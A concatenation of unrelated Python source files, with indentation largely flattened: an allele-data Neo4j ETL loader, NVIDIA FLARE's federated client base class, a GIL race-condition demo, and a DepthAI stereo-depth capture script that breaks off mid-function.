o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:CONTAINS]-(c) """
allele_construct_gene_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey: row.geneId})
MATCH (c:Construct {primaryKey: row.constructId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:IS_ALLELE_OF]-(g)
MERGE (o)-[:CONTAINS]-(c) """
allele_gene_no_construct_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey: row.geneId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:IS_ALLELE_OF]->(g) """
allele_no_gene_no_construct_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
"""
allele_secondaryids_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (f:Allele:Feature {primaryKey:row.data_id})
MERGE (second:SecondaryId {primaryKey:row.secondary_id})
SET second.name = row.secondary_id
MERGE (f)-[aka1:ALSO_KNOWN_AS]->(second) """
allele_synonyms_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (a:Allele:Feature {primaryKey:row.data_id})
MERGE(syn:Synonym {primaryKey:row.synonym})
SET syn.name = row.synonym
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn) """
allele_xrefs_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Allele {primaryKey:row.dataId}) """ + ETLHelper.get_cypher_xref_text()
def __init__(self, config):
"""Initialise Object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
p = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
p.start()
thread_pool.append(p)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
logger.info("Loading Allele Data: %s" % sub_type.get_data_provider())
filepath = sub_type.get_filepath()
logger.info(filepath)
data = JSONFile().get_data(filepath)
if data is None:
logger.warn("No Data found for %s skipping" % sub_type.get_data_provider())
return
# This order is the same as the lists yielded from the get_generators function.
# A list of tuples.
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
# This needs to be in this format (template, param1, params2) others will be ignored
query_list = [
[AlleleETL.allele_gene_no_construct_query_template, commit_size,
"allele_gene_no_construct_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_construct_gene_query_template, commit_size,
"allele_construct_gene_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_construct_no_gene_query_template, commit_size,
"allele_construct_no_gene_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_no_gene_no_construct_query_template, commit_size,
"allele_no_gene_no_construct_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_secondaryids_template, commit_size,
"allele_secondaryids_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_synonyms_template, commit_size,
"allele_synonyms_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_xrefs_template, commit_size, "allele_xrefs_" + sub_type.get_data_provider() + ".csv"],
]
# Obtain the generator
generators = self.get_generators(data, batch_size)
query_and_file_list = self.process_query_params(query_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("Allele-{}: ".format(sub_type.get_data_provider()))
logger.info("Finished Loading Allele Data: %s" % sub_type.get_data_provider())
def secondary_process(self, secondarys, data_record):
"""Get secondary ids.
secondarys: list of dataset items.
data_record: record to process.
"""
if data_record.get('secondaryIds') is None:
return
for sid in data_record.get('secondaryIds'):
secondary_id_dataset = {
"data_id": data_record.get('primaryId'),
"secondary_id": sid
}
secondarys.append(secondary_id_dataset)
def synonyms_process(self, synonyms, data_record):
"""Get synonyms."""
if data_record.get('synonyms') is None:
return
for syn in data_record.get('synonyms'):
syn_dataset = {
"data_id": data_record.get('primaryId'),
"synonym": syn.strip()
}
synonyms.append(syn_dataset)
def crossref_process(self, record, global_id, cross_reference_list):
"""Get xref."""
valid_pages = ['allele', 'allele/references', 'transgene', 'construct',
'transgene/references', 'construct/references']
if 'crossReferences' not in record:
return
for crossRef in record['crossReferences']:
crossRefId = crossRef.get('id')
local_crossref_id = crossRefId.split(":")[1]
prefix = crossRef.get('id').split(":")[0]
pages = crossRef.get('pages')
# some pages collection have 0 elements
if pages is not None and len(pages) > 0:
for page in pages:
if page in valid_pages:
mod_global_cross_ref_id = self.etlh.rdh2.return_url_from_key_value(prefix, local_crossref_id, page)
xref = ETLHelper.get_xref_dict(local_crossref_id, prefix, page, page, crossRefId,
mod_global_cross_ref_id, crossRefId + page)
xref['dataId'] = global_id
cross_reference_list.append(xref)
def get_generators(self, allele_data, batch_size): # noqa
"""Get generators."""
release = ""
        alleles_no_construct_no_gene = []
alleles_construct_gene = []
alleles_no_construct = []
alleles_no_gene = []
allele_synonyms = []
allele_secondary_ids = []
cross_reference_list = []
counter = 0
date_produced = allele_data['metaData']['dateProduced']
# TODO: get SGD to fix their files.
self.data_providers_process(allele_data)
loadKey = date_produced + self.data_provider + "_ALLELE"
if 'release' in allele_data['metaData']:
release = allele_data['metaData']['release']
for allele_record in allele_data['data']:
counter = counter + 1
global_id = allele_record['primaryId']
# fixing parsing error on this end while MGI fixes on their end.
if global_id == 'MGI:3826848':
description = allele_record.get('description')[:-2]
else:
description = allele_record.get('description')
local_id = global_id.split(":")[1]
mod_global_cross_ref_id = ""
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(global_id)
if is_it_test_entry is False:
counter = counter - 1
continue
association_type = ''
short_species_abbreviation = self.etlh.get_short_species_abbreviation(allele_record.get('taxonId'))
symbol_text = TextProcessingHelper.cleanhtml(allele_record.get('symbol'))
if allele_record.get('alleleObjectRelations') is not None:
for relation in allele_record.get('alleleObjectRelations'):
gene_id = ''
                    construct_id = ''
                    association_type = relation.get('objectRelation').get('associationType')
common = {
"alleleDescription": description,
"associationType": association_type,
"symbol": allele_record.get('symbol'),
"globalId": global_id,
"localId": local_id,
"taxonId": allele_record.get('taxonId'),
"dataProvider": self.data_provider,
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": loadKey,
"release": release,
"modGlobalCrossRefId": mod_global_cross_ref_id,
"symbolWithSpecies": allele_record.get('symbol') + " (" + short_species_abbreviation + ")",
"symbolTextWithSpecies": symbol_text + " (" + short_species_abbreviation + ")",
"symbolText": symbol_text,
"primaryId": allele_record.get('primaryId'),
"uuid": str(uuid.uuid4())
}
if relation.get('objectRelation').get('gene') is not None:
gene_id = relation.get('objectRelation').get('gene')
if relation.get('objectRelation').get('construct') is not None:
construct_id = relation.get('objectRelation').get('construct')
if gene_id != '' and construct_id != '':
common["geneId"] = gene_id
common["constructId"] = construct_id
alleles_construct_gene.append(common)
elif construct_id != '' and gene_id == '':
common["constructId"] = construct_id
common.pop('geneId', None)
alleles_no_gene.append(common)
elif gene_id != '' and construct_id == '':
common["geneId"] = gene_id
common.pop('constructId', None)
alleles_no_construct.append(common)
elif gene_id == '' and construct_id == '':
common.pop('geneId', None)
common.pop('constructId', None)
                        alleles_no_construct_no_gene.append(common)
else:
common = {
"alleleDescription": description,
"associationType": association_type,
"symbol": allele_record.get('symbol'),
"globalId": global_id,
"localId": local_id,
"taxonId": allele_record.get('taxonId'),
"dataProvider": self.data_provider,
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": loadKey,
"release": release,
"modGlobalCrossRefId": mod_global_cross_ref_id,
"symbolWithSpecies": allele_record.get('symbol') + " (" + short_species_abbreviation + ")",
"symbolTextWithSpecies": symbol_text + " (" + short_species_abbreviation + ")",
"symbolText": symbol_text,
"primaryId": allele_record.get('primaryId'),
"uuid": str(uuid.uuid4())
}
                alleles_no_construct_no_gene.append(common)
self.crossref_process(allele_record, global_id, cross_reference_list)
self.synonyms_process(allele_synonyms, allele_record)
self.secondary_process(allele_secondary_ids, allele_record)
if counter == batch_size:
                yield [alleles_no_construct, alleles_construct_gene, alleles_no_gene, alleles_no_construct_no_gene,
allele_secondary_ids, allele_synonyms, cross_reference_list]
alleles_no_construct = []
alleles_construct_gene = []
alleles_no_gene = []
                alleles_no_construct_no_gene = []
allele_secondary_ids = []
allele_synonyms = []
cross_reference_list = []
counter = 0
if counter > 0:
            yield [alleles_no_construct, alleles_construct_gene, alleles_no_gene, alleles_no_construct_no_gene,
allele_secondary_ids, allele_synonyms, cross_reference_list]
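
# Illustrative sketch (added for clarity, not part of the original ETL): get_generators() above uses
# a batch-and-yield pattern -- append each record to per-query lists, yield all of the lists once
# batch_size records have been collected, reset them, and flush whatever remains after the loop.
# The hypothetical, stand-alone helper below shows the same pattern for a single list of rows.
def batch_rows(records, batch_size):
    """Yield lists of at most batch_size records (illustration only, not used by AlleleETL)."""
    batch = []
    for record in records:
        batch.append(record)
        if len(batch) == batch_size:
            yield batch
            batch = []
    if batch:
        yield batch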
|
fed_client_base.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool
from typing import List, Optional
from nvflare.apis.filter import Filter
from nvflare.apis.fl_component import FLComponent
from nvflare.apis.fl_constant import FLContextKey
from nvflare.apis.fl_context import FLContext
from nvflare.apis.fl_exception import FLCommunicationError
from nvflare.apis.overseer_spec import SP
from nvflare.apis.shareable import Shareable
from nvflare.apis.signal import Signal
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import EngineConstant
from .client_status import ClientStatus
from .communicator import Communicator
class FederatedClientBase:
"""The client-side base implementation of federated learning.
    This class provides the tool functions used by both FedClient and FedClientLite.
"""
def __init__(
self,
client_name,
client_args,
secure_train,
server_args=None,
retry_timeout=30,
client_state_processors: Optional[List[Filter]] = None,
handlers: Optional[List[FLComponent]] = None,
compression=None,
overseer_agent=None,
args=None,
components=None,
):
"""To init FederatedClientBase.
Args:
client_name: client name
client_args: client config args
secure_train: True/False to indicate secure train
server_args: server config args
retry_timeout: retry timeout
client_state_processors: client state processor filters
handlers: handlers
compression: communication compression algorithm
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.client_name = client_name
self.token = None
self.ssid = None
self.client_args = client_args
self.servers = server_args
self.communicator = Communicator(
ssl_args=client_args,
secure_train=secure_train,
retry_timeout=retry_timeout,
client_state_processors=client_state_processors,
compression=compression,
)
self.secure_train = secure_train
self.handlers = handlers
self.components = components
self.heartbeat_done = False
self.fl_ctx = FLContext()
self.platform = None
self.abort_signal = Signal()
self.engine = None
self.status = ClientStatus.NOT_STARTED
self.remote_tasks = None
self.sp_established = False
self.overseer_agent = overseer_agent
self.overseer_agent = self._init_agent(args)
if secure_train:
if self.overseer_agent:
self.overseer_agent.set_secure_context(
ca_path=client_args["ssl_root_cert"],
cert_path=client_args["ssl_cert"],
prv_key_path=client_args["ssl_private_key"],
)
self.overseer_agent.start(self.overseer_callback)
def _init_agent(self, args=None):
kv_list = parse_vars(args.set)
sp = kv_list.get("sp")
if sp:
fl_ctx = FLContext()
fl_ctx.set_prop(FLContextKey.SP_END_POINT, sp)
self.overseer_agent.initialize(fl_ctx)
return self.overseer_agent
def overseer_callback(self, overseer_agent):
if overseer_agent.is_shutdown():
self.engine.shutdown()
return
sp = overseer_agent.get_primary_sp()
self.set_primary_sp(sp)
def set_sp(self, project_name, sp: SP):
if sp and sp.primary is True:
server = self.servers[project_name].get("target")
location = sp.name + ":" + sp.fl_port
if server != location:
self.servers[project_name]["target"] = location
self.sp_established = True
self.logger.info(f"Got the new primary SP: {location}")
if self.ssid and self.ssid != sp.service_session_id:
self.ssid = sp.service_session_id
thread = threading.Thread(target=self._switch_ssid)
thread.start()
def _switch_ssid(self):
if self.engine:
for job_id in self.engine.get_all_job_ids():
self.engine.abort_task(job_id)
# self.register()
self.logger.info(f"Primary SP switched to new SSID: {self.ssid}")
def client_register(self, project_name):
"""Register the client to the FL server.
Args:
project_name: FL study project name.
"""
if not self.token:
try:
self.token, self.ssid = self.communicator.client_registration(
self.client_name, self.servers, project_name
)
if self.token is not None:
self.fl_ctx.set_prop(FLContextKey.CLIENT_NAME, self.client_name, private=False)
self.fl_ctx.set_prop(EngineConstant.FL_TOKEN, self.token, private=False)
self.logger.info(
"Successfully registered client:{} for project {}. Token:{} SSID:{}".format(
self.client_name, project_name, self.token, self.ssid
)
)
except FLCommunicationError:
self.communicator.heartbeat_done = True
def fetch_execute_task(self, project_name, fl_ctx: FLContext):
"""Fetch a task from the server.
Args:
project_name: FL study project name
fl_ctx: FLContext
Returns:
A CurrentTask message from server
"""
try:
self.logger.debug("Starting to fetch execute task.")
task = self.communicator.getTask(self.servers, project_name, self.token, self.ssid, fl_ctx)
return task
except FLCommunicationError as e:
self.logger.info(e)
def push_execute_result(self, project_name, shareable: Shareable, fl_ctx: FLContext):
"""Submit execution results of a task to server.
Args:
project_name: FL study project name
shareable: Shareable object
fl_ctx: FLContext
Returns:
A FederatedSummary message from the server.
"""
try:
self.logger.info("Starting to push execute result.")
execute_task_name = fl_ctx.get_prop(FLContextKey.TASK_NAME)
message = self.communicator.submitUpdate(
self.servers,
project_name,
self.token,
self.ssid,
fl_ctx,
self.client_name,
shareable,
execute_task_name,
)
return message
except FLCommunicationError as e:
self.logger.info(e)
def send_aux_message(self, project_name, topic: str, shareable: Shareable, timeout: float, fl_ctx: FLContext):
"""Send auxiliary message to the server.
Args:
project_name: FL study project name
topic: aux topic name
shareable: Shareable object
timeout: communication timeout
fl_ctx: FLContext
Returns:
A reply message
"""
try:
self.logger.debug("Starting to send aux message.")
message = self.communicator.auxCommunicate(
self.servers, project_name, self.token, self.ssid, fl_ctx, self.client_name, shareable, topic, timeout
)
return message
except FLCommunicationError as e:
self.logger.info(e)
def send_heartbeat(self, project_name):
try:
if self.token:
while not self.engine:
time.sleep(1.0)
self.communicator.send_heartbeat(
self.servers, project_name, self.token, self.ssid, self.client_name, self.engine
)
except FLCommunicationError as e:
self.communicator.heartbeat_done = True
def heartbeat(self):
"""Sends a heartbeat from the client to the server."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(self.send_heartbeat, tuple(self.servers))
finally:
if pool:
pool.terminate()
def pull_task(self, fl_ctx: FLContext):
"""Fetch remote models and update the local client's session."""
pool = None
try:
pool = ThreadPool(len(self.servers))
self.remote_tasks = pool.map(partial(self.fetch_execute_task, fl_ctx=fl_ctx), tuple(self.servers))
pull_success, task_name = self.check_progress(self.remote_tasks)
# # Update app_ctx's current round info
# if self.app_context and self.remote_models[0] is not None:
# self.app_context.global_round = self.remote_models[0].meta.current_round
# TODO: if some of the servers failed
# return self.model_manager.assign_current_model(self.remote_models)
return pull_success, task_name, self.remote_tasks
finally:
if pool:
pool.terminate()
def push_results(self, shareable: Shareable, fl_ctx: FLContext):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(partial(self.push_execute_result, shareable=shareable, fl_ctx=fl_ctx), tuple(self.servers))
finally:
if pool:
pool.terminate()
def aux_send(self, topic, shareable: Shareable, timeout: float, fl_ctx: FLContext):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
messages = pool.map(
partial(self.send_aux_message, topic=topic, shareable=shareable, timeout=timeout, fl_ctx=fl_ctx),
tuple(self.servers),
)
if messages is not None and messages[0] is not None:
# Only handle single server communication for now.
return messages
else:
return None
finally:
if pool:
pool.terminate()
def register(self):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(self.client_register, tuple(self.servers))
finally:
if pool:
pool.terminate()
def set_primary_sp(self, sp):
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(partial(self.set_sp, sp=sp), tuple(self.servers))
finally:
if pool:
pool.terminate()
def run_heartbeat(self):
"""Periodically runs the heartbeat."""
self.heartbeat()
def start_heartbeat(self):
heartbeat_thread = threading.Thread(target=self.run_heartbeat)
heartbeat_thread.start()
def quit_remote(self, task_name, fl_ctx: FLContext):
"""Sending the last message to the server before leaving.
Args:
task_name: task name
fl_ctx: FLContext
Returns: N/A
"""
return self.communicator.quit_remote(self.servers, task_name, self.token, self.ssid, fl_ctx)
def set_client_engine(self, engine):
self.engine = engine
def close(self):
"""Quit the remote federated server, close the local session."""
self.logger.info("Shutting down client")
self.overseer_agent.end()
return 0
def check_progress(self, remote_tasks):
if remote_tasks[0] is not None:
self.server_meta = remote_tasks[0].meta
return True, remote_tasks[0].task_name
else:
return False, None
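
# Illustrative sketch (added for clarity, not part of the original NVFlare module): heartbeat(),
# pull_task(), push_results(), aux_send(), register() and set_primary_sp() above all share the same
# pattern -- build a thread pool sized to the number of servers, map a per-server callable over the
# server names, and always terminate the pool in a finally block. A generic, hypothetical version of
# that pattern (reusing the ThreadPool alias imported at the top of this module) looks like this:
def fan_out(per_server_fn, servers):
    """Apply per_server_fn to every server and return the list of results."""
    pool = None
    try:
        pool = ThreadPool(len(servers))
        return pool.map(per_server_fn, tuple(servers))
    finally:
        if pool:
            pool.terminate()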
|
python_gil.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# GIL: the global interpreter lock (CPython)
# In CPython, each Python thread corresponds to one underlying C/OS thread.
# The GIL allows only one thread at a time to execute Python bytecode on a CPU,
# so multiple threads cannot be mapped onto multiple CPUs for bytecode execution.
# The interpreter releases the GIL periodically (based on the amount of bytecode executed
# and on time slices), and it is also released around blocking I/O operations.
# import dis
# def add(a):
# a = a + 1
# return a
#
# print(dis.dis(add))
total = 0
def add():
global total
for i in range(1000000):
total += 1
def desc():
global total
for i in range(1000000):
total -= 1
import threading
thread1 = threading.Thread(target=add)
thread2 = threading.Thread(target=desc)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print(total)
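
# Illustrative sketch (added for clarity, not part of the original script): "total += 1" compiles to
# several bytecode instructions, and the GIL can be released between them, so the two threads above
# interleave and the printed result is usually not 0. Guarding the shared counter with a
# threading.Lock makes each read-modify-write atomic, so the same workload then reliably prints 0.
def locked_demo():
    counter = 0
    lock = threading.Lock()

    def add_locked():
        nonlocal counter
        for _ in range(1000000):
            with lock:
                counter += 1

    def desc_locked():
        nonlocal counter
        for _ in range(1000000):
            with lock:
                counter -= 1

    t1 = threading.Thread(target=add_locked)
    t2 = threading.Thread(target=desc_locked)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    print(counter)  # always 0: increments and decrements no longer interleave mid-update

# Uncomment to run the lock-protected version:
# locked_demo()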
|
rgb-depth-encoding-v3.py
|
#!/usr/bin/env python3
import os
import cv2
import sys
import time
import depthai as dai
import numpy as np
import socket
import struct
import pickle
from pathlib import Path
from datetime import datetime
from argument_parser import argument_parser
from colormaps import apply_colormap
from utils import dequeue, dequeued_frames_dict, datetime_from_string, create_encoder, wlsFilter, compute_fps
import multiprocessing
import colored # https://pypi.org/project/colored/
rst = colored.attr('reset')
from circular_buffer import CircularBuffer
ringbuffer = CircularBuffer(10)
def preview_thread_impl(args, preview_counter, depth_frame, disp_img, rr_img, colored_disp):
if args.debug_preview_threading:
print(f'preview_thread_impl() got frame no.: {preview_counter} - {type(depth_frame)} - {type(disp_img)} - {type(rr_img)} - {type(colored_disp)}')
if args.preview_downscale_factor != 1:
depth_frame = cv2.resize(depth_frame, dsize=(depth_w//args.preview_downscale_factor, depth_h//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.debug_img_sizes:
print(f'{depth_frame.shape = } - {len(depth_frame) = } - {type(depth_frame) = } - {depth_frame.size = }')
depth_frame_orig = cv2.normalize(depth_frame, None, 0, 255, cv2.NORM_MINMAX)
if args.show_colored_disp:
depth_frame = np.ascontiguousarray(depth_frame_orig)
# depth_frame is transformed, the color map will be applied to highlight the depth info
depth_frame = apply_colormap(depth_frame, cmap=13)
# depth_frame is ready to be shown
cv2.imshow("colored disparity", depth_frame)
# Retrieve 'bgr' (opencv format) frame
if args.show_rgb:
rgb_frame = in_rgb.getCvFrame()
if args.preview_downscale_factor != 1:
rgb_frame = cv2.resize(rgb_frame, dsize=(color_width//args.preview_downscale_factor, color_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.debug_img_sizes:
print(f'{rgb_frame.shape = } - {len(rgb_frame) = } - {type(rgb_frame) = } - {rgb_frame.size = }')
cv2.imshow("rgb", rgb_frame)
#img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
if args.show_th_disp:
depth_frame_th = cv2.adaptiveThreshold(depth_frame_orig, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
cv2.imshow("disparity th", depth_frame_th)
depth_frame_th_color = cv2.cvtColor(depth_frame_th, cv2.COLOR_GRAY2BGR)
if False:
rgb_frame_resized = cv2.resize(rgb_frame, dsize=(depth_w, depth_h), interpolation=cv2.INTER_CUBIC)
combo = (rgb_frame_resized + depth_frame_th_color) / 2
cv2.imshow("combo", combo)
if args.show_gray_disp and disp_img is not None:
cv2.imshow("grayscale disparity", disp_img)
if args.show_rr_img and rr_img is not None:
cv2.imshow("rr_img", rr_img)
if args.show_wls_preview:
cv2.imshow("WLS colored disp", colored_disp)
if cv2.waitKey(1) == ord('q'): # this is the culprit! https://answers.opencv.org/question/52774/waitkey1-timing-issues-causing-frame-rate-slow-down-fix/
return
args = argument_parser()
# Run with:
# ./rgb-depth-encoding.py --confidence 200 --no-extended-disparity --depth-resolution 720p --wls-filter
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-left --rectified-right --no-write-preview --no-rgb --wls-filter
# ./rgb-depth-encoding.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-right --no-write-preview --no-rgb
# v2 - 60 FPS with rectified-right + rectified-left + disparity
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-left --rectified-right --no-write-preview --no-rgb
# v2 - 46.5 FPS with rectified-right + disparity + RGB 1080p
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-right --no-write-preview
start_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
color_outfn = f'{args.output_dir}/color-{start_time}.h265'
wls_outfn = f'{args.output_dir}/wls-{start_time}.avi'
rr_outfn = f'{args.output_dir}/rectright-{start_time}.h265'
rl_outfn = f'{args.output_dir}/rectleft-{start_time}.h265'
if args.disparity:
depth_outfn = f'{args.output_dir}/depth-{start_time}.h265'
else:
left_outfn = f'{args.output_dir}/left-{start_time}.h265'
right_outfn = f'{args.output_dir}/right-{start_time}.h265'
# video = cv2.VideoWriter('appsrc ! queue ! videoconvert ! video/x-raw ! omxh265enc ! video/x-h265 ! h265parse ! rtph265pay ! udpsink host=192.168.0.2 port=5000 sync=false',0,25.0,(640,480))
# Start defining a pipeline
pipeline = dai.Pipeline()
color_resolutions = {
'1080p': (1920, 1080, 60, dai.ColorCameraProperties.SensorResolution.THE_1080_P),
'4K' : (3840, 2160, 60, dai.ColorCameraProperties.SensorResolution.THE_4_K),
}
depth_resolutions = {
'720p': (1280, 720, 60, dai.MonoCameraProperties.SensorResolution.THE_720_P),
'800p': (1280, 800, 60, dai.MonoCameraProperties.SensorResolution.THE_800_P),
'400p': (640, 400, 120, dai.MonoCameraProperties.SensorResolution.THE_400_P),
}
color_resolution = color_resolutions[args.color_resolution]
depth_resolution = depth_resolutions[args.depth_resolution]
color_width, color_height, color_fps, color_profile = color_resolution
depth_width, depth_height, depth_fps, dprofile = depth_resolution
if args.rgb:
# Define a source - color camera
cam_rgb = pipeline.createColorCamera()
cam_rgb.setPreviewSize(color_width, color_height)
cam_rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
cam_rgb.setResolution(color_profile)
cam_rgb.setInterleaved(False)
cam_rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
cam_rgb.setFps(color_fps)
print(f'\nSaving capture files to: {colored.fg("red") + args.output_dir + rst}\n')
# Define a source - two mono (grayscale) cameras
left = pipeline.createMonoCamera()
left.setResolution(dprofile)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
left.setFps(depth_fps)
right = pipeline.createMonoCamera()
right.setResolution(dprofile)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
right.setFps(depth_fps)
# Create a node that will produce the depth map (using disparity output as it's easier to visualize depth this way)
depth = pipeline.createStereoDepth()
depth.setConfidenceThreshold(args.confidence)
#depth.setOutputRectified(True) # The rectified streams are horizontally mirrored by default
depth.setRectifyEdgeFillColor(0) # Black, to better see the cutout from rectification (black stripe on the edges)
depth.setLeftRightCheck(False)
if args.wls_filter: #or args.rectified_right or args.rectified_left:
xoutRectifiedRight = pipeline.createXLinkOut()
xoutRectifiedRight.setStreamName("rectifiedRight")
depth.rectifiedRight.link(xoutRectifiedRight.input)
xoutRectifiedLeft = pipeline.createXLinkOut()
xoutRectifiedLeft.setStreamName("rectifiedLeft")
depth.rectifiedLeft.link(xoutRectifiedLeft.input)
if args.write_wls_preview:
wls_cap = cv2.VideoWriter(wls_outfn, cv2.VideoWriter.fourcc('M','J','P','G'), depth_fps, (depth_width, depth_height))
#cv2.VideoWriter_fourcc(*"MJPG"), 30,(640,480))
'''
If one or more of the additional depth modes (lrcheck, extended, subpixel)
are enabled, then:
- depth output is FP16. TODO enable U16.
- median filtering is disabled on device. TODO enable.
- with subpixel, either depth or disparity has valid data.
Otherwise, depth output is U16 (mm) and median is functional.
But like on Gen1, either depth or disparity has valid data. TODO enable both.
'''
left.out.link(depth.left)
right.out.link(depth.right)
baseline = 75 #mm
disp_levels = 96
fov = 71.86
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
wls_data = [] # filtered_disp, colored_disp = pool.map(apply_wls_filter, (disp_imgs, rr_imgs))
#wls_results = []
wls_counter = 0
def wls_worker(queue_in, queue_out, wlsFilter):
print(f'wls_worker() thread {os.getpid()} starting...')
while True:
if args.debug_wls_threading:
print(f'Thread {os.getpid()} dequeuing (wls_queue_in.size: {wls_queue_in.qsize()})...')
item = queue_in.get(True)
if args.debug_wls_threading:
print(f'Thread {os.getpid()} got item {type(item)}...')
wls_counter, disp_img, rr_img = item
if args.debug_wls_threading:
print(f'Thread {os.getpid()} got frame no: {wls_counter} - {disp_img.shape} - {rr_img.shape}...')
wls_data = (wls_counter, disp_img, rr_img)
wls_counter_out, filtered_disp, colored_disp = wlsFilter.apply_wls_filter(wls_data)
if args.debug_wls_threading:
print(f'Thread {os.getpid()} completed frame no: {wls_counter} ({wls_counter_out}) - {disp_img.shape} - {rr_img.shape}...')
if args.write_wls_preview:
wls_cap.write(colored_disp)
if args.debug_wls_threading:
